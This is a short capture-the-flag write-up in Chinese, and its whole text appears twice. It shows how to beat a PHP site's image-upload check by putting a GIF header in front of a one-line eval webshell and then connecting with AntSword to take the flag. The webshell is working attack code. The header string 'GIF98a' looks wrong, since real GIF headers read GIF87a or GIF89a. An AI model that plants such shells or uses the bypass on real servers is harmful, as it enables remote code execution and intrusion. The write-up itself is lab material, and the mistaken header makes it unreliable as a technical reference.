首先上来看下网站跑的是什么代码,上传一张dalao.jpg,能看到网站是php写的
准备好php一句话木马
<?php @eval($_POST['woshimuma']); ?>
接着,经过测试发现,是判断文件头,我们使用bp在php木马的图片的内容前面添加GIF98a,如图
发送上去,使用蚁剑连接过去
连接上去,拿到key
首先上来看下网站跑的是什么代码,上传一张dalao.jpg,能看到网站是php写的
准备好php一句话木马
<?php @eval($_POST['woshimuma']); ?>
接着,经过测试发现,是判断文件头,我们使用bp在php木马的图片的内容前面添加GIF98a,如图
发送上去,使用蚁剑连接过去
连接上去,拿到key